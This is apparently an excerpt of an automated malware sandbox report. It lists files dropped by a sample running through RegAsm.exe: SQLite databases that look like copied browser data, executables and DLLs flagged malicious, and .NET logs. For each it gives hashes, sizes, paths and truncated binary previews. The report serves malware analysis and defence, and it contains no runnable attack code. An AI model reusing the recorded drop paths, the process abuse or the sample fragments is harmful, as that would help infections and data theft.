                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):40960
                                                                                    Entropy (8bit):0.8553638852307782
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                    Category:dropped
                                                                                    Size (bytes):159744
                                                                                    Entropy (8bit):0.7873599747470391
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):106496
                                                                                    Entropy (8bit):1.1358696453229276
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):114688
                                                                                    Entropy (8bit):0.9746603542602881
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):98304
                                                                                    Entropy (8bit):0.08235737944063153
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):32768
                                                                                    Entropy (8bit):0.017262956703125623
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                    Malicious:false
                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):126976
                                                                                    Entropy (8bit):0.47147045728725767
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                    Category:dropped
                                                                                    Size (bytes):28672
                                                                                    Entropy (8bit):2.5793180405395284
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                    Category:dropped
                                                                                    Size (bytes):159744
                                                                                    Entropy (8bit):0.7873599747470391
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                    Category:dropped
                                                                                    Size (bytes):28672
                                                                                    Entropy (8bit):2.5793180405395284
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):413224
                                                                                    Entropy (8bit):7.989371105778008
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
                                                                                    MD5:F73186DF5A030CF7F186B0737C3AF1F7
                                                                                    SHA1:D15E45FEEFBBC010DB92AE897D80BC7419C0D046
                                                                                    SHA-256:05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
                                                                                    SHA-512:A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H........*..0...............................................................^.8=..Q..v A.3[R.J*.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):385064
                                                                                    Entropy (8bit):7.98819744237574
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
                                                                                    MD5:47697A60A96C5ADEF362D8DA9A274B7D
                                                                                    SHA1:16DBC512F121C27E2CB48A61D6DCF166AA792E0D
                                                                                    SHA-256:63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
                                                                                    SHA-512:4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J*.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc*.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..|....G...g.:!rM[~...e.Bp..bz.{....`5......|..|b.O....G......A.h...}s8...W.PaG?...U.K%.9].|.....wc\|..B..K=.D..u..G.@..q...y0g...5..i.......<
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):685392
                                                                                    Entropy (8bit):6.872871740790978
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):608080
                                                                                    Entropy (8bit):6.833616094889818
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):450024
                                                                                    Entropy (8bit):6.673992339875127
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2046288
                                                                                    Entropy (8bit):6.787733948558952
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):257872
                                                                                    Entropy (8bit):6.727482641240852
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):80880
                                                                                    Entropy (8bit):6.920480786566406
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\ProgramData\AFHDGDGIID.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):847
                                                                                    Entropy (8bit):5.345615485833535
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                    MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                    SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                    SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                    SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                    Process:C:\ProgramData\GIIIIJDHJE.exe
                                                                                    File Type:CSV text
                                                                                    Category:modified
                                                                                    Size (bytes):425
                                                                                    Entropy (8bit):5.353683843266035
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                    MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                    Process:C:\ProgramData\IDBAFHDGDG.exe
                                                                                    File Type:CSV text
                                                                                    Category:modified
                                                                                    Size (bytes):425
                                                                                    Entropy (8bit):5.353683843266035
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                    MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:CSV text
                                                                                    Category:modified
                                                                                    Size (bytes):425
                                                                                    Entropy (8bit):5.353683843266035
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                    MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
